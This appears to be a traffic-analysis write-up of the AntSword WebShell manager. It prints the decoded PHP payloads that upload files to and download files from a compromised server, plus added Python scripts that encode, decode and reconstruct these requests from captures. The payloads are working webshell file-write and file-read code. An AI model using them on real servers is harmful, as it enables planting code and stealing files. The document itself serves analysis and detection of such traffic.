Introduction
AntSword (蚁剑) is an open-source, cross-platform WebShell management tool aimed at authorized penetration testers and at website administrators doing routine maintenance. Analyzing the traffic of open-source tools like this and studying the ideas behind how they are written will help me in my future penetration-testing work.
Traffic analysis
Today we look at the traffic AntSword generates for file upload and file download.
1. First point AntSword at a proxy, capture an upload, and run the request body through the decode module.
2. Once decoded, load it into PhpStorm for review.
3. The complete decoded code is as follows:
```php
<?php
@ini_set("display_errors", "0");   // hide PHP warnings so they do not pollute the response
@set_time_limit(0);
// asenc() is the response encoder; the default encoder returns the output unchanged
function asenc($out)
{
    return $out;
}
;
// asoutput() wraps the buffered output between two per-request marker strings
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "edc1896f";
    echo @asenc($output);
    echo "6e3af";
}
$f8a20340da4868 = 'yjQzovcGhwU3R1ZHkvV1dXL3RyYWNlLjc3NTY5MDc2Lnh0';   // 2 junk chars + base64(target path)
$p59b27f32963f6 = '…';   // hex-encoded file content (the literal is omitted on the page)
ob_start();
try {
    $f = base64_decode(substr($f8a20340da4868, 2));   // drop the two junk chars, decode the path
    $c = $p59b27f32963f6;
    $c = str_replace("\r", "", $c);   // tolerate line breaks inside the hex string
    $c = str_replace("\n", "", $c);
    $buf = "";
    // two hex chars per byte: urldecode("%41") === "A"
    for ($i = 0; $i < strlen($c); $i += 2) $buf .= urldecode("%" . substr($c, $i, 2));
    // append mode: repeated requests for the same path keep extending the file
    echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
```
4. Stepping through it in the debugger shows:
(1) AntSword POSTs two parameters: the target path for the upload and the file content.
(2) The path is base64-encoded, with two meaningless characters prepended as obfuscation; the server drops them with substr(..., 2). In this capture the value decodes to C:/phpStudy/WWW/trace.77569076.xt.
(3) The content is sent URL-encoded with the % signs removed, i.e. as a plain hex string, two characters per byte.
(4) Once both parameters are available, the server first strips any CR/LF, then a for loop walks the string two characters at a time and rebuilds each byte with urldecode("%" . pair).
(5) The decoded bytes are concatenated into $buf; the file is opened with fopen in append mode ("a"), so repeated requests for the same path keep appending, and fwrite writes the content. The reply is "1" on success or "0" on failure, wrapped between the two per-request marker strings echoed by asoutput() (here edc1896f and 6e3af), which the client uses to cut the real output out of the response body.
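To make the encoding concrete, here is an added Python example (it is not from the page and not AntSword's own code) that reproduces both sides of the upload: the client-side encoding of the two parameters, a mirror of the server-side decoding including the CR/LF stripping and PHP's urldecode behaviour on non-hex pairs, and a small parser that pulls the target path and file bytes back out of a decoded upload request, which is what you need when reconstructing an upload from a capture. The request template, the sample file and the path /var/www/html/a.txt are constructed for the example and modelled on the capture above; the parameter names are random per request, so the parser locates them by how the PHP uses them rather than by name.

```python
import base64
import re

# Constructed request body modelled on the page's capture; the parameter names
# ($f8a20340da4868 = path, $p59b27f32963f6 = content) are random per request,
# so the parser finds them by usage rather than by name.
UPLOAD_TEMPLATE = """<?php
$f8a20340da4868 = '__PATH__';
$p59b27f32963f6 = '__CONTENT__';
ob_start();
try {
    $f = base64_decode(substr($f8a20340da4868, 2));
    $c = $p59b27f32963f6;
    $c = str_replace("\\r", "", $c);
    $c = str_replace("\\n", "", $c);
    $buf = "";
    for ($i = 0; $i < strlen($c); $i += 2) $buf .= urldecode("%" . substr($c, $i, 2));
    echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
"""

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


# ---- client side: how the two parameters are produced ----

def encode_path(path: str, junk: str = "yj") -> str:
    """Two throwaway characters followed by base64(path); the captures show 'yj' and 'zX'."""
    return junk + base64.b64encode(path.encode()).decode()


def encode_content(data: bytes) -> str:
    """URL-encoding with every '%' removed, i.e. plain hex, two characters per byte."""
    return data.hex()


# ---- server side, mirrored: what the PHP does with them ----

def decode_path(value: str) -> str:
    """substr($v, 2) followed by base64_decode()."""
    return base64.b64decode(value[2:]).decode()


def decode_content(value: str) -> bytes:
    """Strip CR/LF, then urldecode('%' . pair) for each two-character slice.
    PHP's urldecode leaves a non-hex '%xy' untouched, so that case is mirrored too."""
    value = value.replace("\r", "").replace("\n", "")
    out = bytearray()
    for i in range(0, len(value), 2):
        pair = value[i:i + 2]
        if HEX_PAIR.fullmatch(pair):
            out.append(int(pair, 16))
        else:
            out += ("%" + pair).encode()
    return bytes(out)


# ---- forensic use: recover path and bytes from a decoded upload request ----

def parse_upload_payload(php: str) -> tuple[str, bytes]:
    """Locate the path literal (fed to substr(..., 2)) and the content literal
    (assigned to $c), then decode both the way the server does."""
    literals = dict(re.findall(r"\$(\w+) = '([^']*)';", php))
    path_var = re.search(r"base64_decode\(substr\(\$(\w+), 2\)\)", php).group(1)
    content_var = re.search(r"\$c = \$(\w+);", php).group(1)
    return decode_path(literals[path_var]), decode_content(literals[content_var])


def build_sample_payload() -> str:
    """Constructed upload of a small PHP file, with a CRLF dropped into the hex so the
    server-side newline stripping is exercised."""
    hexed = encode_content(b"<?php echo 'hi'; ?>\n")
    hexed = hexed[:10] + "\r\n" + hexed[10:]
    return (UPLOAD_TEMPLATE.replace("__PATH__", encode_path("/var/www/html/a.txt"))
                           .replace("__CONTENT__", hexed))


if __name__ == "__main__":
    target, data = parse_upload_payload(build_sample_payload())
    print(target)
    print(data)
```

Because decode_content mirrors PHP exactly, a malformed pair such as "zz" comes back as the literal bytes "%zz" instead of raising, which is also what ends up in the file on the server.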
Next, the download part
1. Capture and decode the request in the same way and step into the debugger.
2. The complete decoded code is as follows:
```php
<?php
@ini_set("display_errors", "0");   // hide PHP warnings so they do not pollute the response
@set_time_limit(0);
// asenc() is the response encoder; the default encoder returns the output unchanged
function asenc($out)
{
    return $out;
}
;
// asoutput() wraps the buffered output between two per-request marker strings
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "8593e78c";
    echo @asenc($output);
    echo "3471a";
}
$oe0c7b4e335b8e = 'zXQzovcGhwU3R1ZHkvV1dXLzEudHh0';   // 2 junk chars + base64("C:/phpStudy/WWW/1.txt")
ob_start();
try {
    // legacy magic_quotes handling: stripslashes() only when the old setting is on
    // (get_magic_quotes_gpc() was removed in PHP 8.0, so this line fatals there)
    $F = base64_decode(substr(get_magic_quotes_gpc() ? stripslashes($oe0c7b4e335b8e) : $oe0c7b4e335b8e, 2));
    $fp = @fopen($F, "r");
    // readability probe: fgetc() returns false at EOF, and the string "0" is falsy too
    if (@fgetc($fp)) {
        @fclose($fp);
        @readfile($F);   // stream the whole file into the output buffer
    } else {
        echo("ERROR:// Can Not Read");
    };
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
```
3. Stepping through it in the debugger shows:
(1) The download flow: the name of the file to fetch is POSTed base64-encoded (encoded, not encrypted), with two meaningless leading characters meant to confuse security software; here it decodes to C:/phpStudy/WWW/1.txt.
(2) The server opens the file with fopen and reads a single character with fgetc as a readability probe. If that succeeds it closes the handle and readfile() streams the whole file into the output buffer; otherwise it answers "ERROR:// Can Not Read". Note that the probe is a plain truthiness check, so in PHP an empty file, or one whose first byte is "0", is reported as unreadable.
(3) Finally the buffered data, framed by the per-request markers 8593e78c and 3471a, is returned in the response body and AntSword saves it to the local machine.
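The response side is worth automating too: when reconstructing a download from a capture you need the marker strings from the request to cut the file out of the response body. Here is an added Python example (not from the page and not AntSword's own code) that pulls the markers out of a decoded download payload, decodes the requested path, extracts the file bytes from the response while tolerating leading noise, surfaces the server's "ERROR://" replies, and mirrors the fgetc truthiness quirk described above. The trimmed payload and the response body are constructed for the example; the markers and the path literal are the ones from the capture.

```python
import base64
import re

# Constructed example: a trimmed copy of the page's download payload, keeping the
# asoutput() markers (8593e78c / 3471a) and the path literal from the capture.
SAMPLE_PAYLOAD = """<?php
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "8593e78c";
echo @asenc($output);
echo "3471a";
}
$oe0c7b4e335b8e = 'zXQzovcGhwU3R1ZHkvV1dXLzEudHh0';
"""

# Constructed response body for a file that reads fine.
SAMPLE_RESPONSE = b"8593e78c" + b"secret\r\n" + b"3471a"

MARKER_RE = re.compile(r'echo "(\w+)";\s*echo @asenc\(\$output\);\s*echo "(\w+)";')


def requested_path(php: str) -> str:
    """The path parameter: the quoted literal assignment, minus its two junk chars."""
    literal = re.search(r"\$\w+ = '([^']*)';", php).group(1)
    return base64.b64decode(literal[2:]).decode()


def response_markers(php: str) -> tuple[bytes, bytes]:
    """Prefix/suffix that asoutput() echoes around the real output, per request."""
    m = MARKER_RE.search(php)
    if m is None:
        raise ValueError("asoutput() markers not found in payload")
    return m.group(1).encode(), m.group(2).encode()


def extract_download(php: str, response: bytes) -> bytes:
    """Cut the file bytes out of a captured response using the markers from its request.
    The default encoder (asenc) passes data through unchanged, so this is raw file content."""
    prefix, suffix = response_markers(php)
    start = response.find(prefix)          # anything before the prefix is noise
    end = response.rfind(suffix)           # the suffix is the last thing echoed
    if start < 0 or end < 0 or end < start + len(prefix):
        raise ValueError("response is not framed by the expected markers")
    body = response[start + len(prefix):end]
    if body.startswith(b"ERROR://"):
        raise RuntimeError(body.decode(errors="replace"))
    return body


def server_reports_readable(first_bytes: bytes) -> bool:
    """Mirror of `if (@fgetc($fp))`: fgetc() returns false at EOF and the string "0"
    is falsy in PHP, so an empty file or one starting with '0' gets "Can Not Read"."""
    return len(first_bytes) > 0 and first_bytes[:1] != b"0"


if __name__ == "__main__":
    print(requested_path(SAMPLE_PAYLOAD))
    print(extract_download(SAMPLE_PAYLOAD, SAMPLE_RESPONSE))
```

Using find for the prefix and rfind for the suffix keeps the extraction correct even if the file itself happens to contain one of the marker strings, since the real markers always sit at the outer edges of what asoutput() emits.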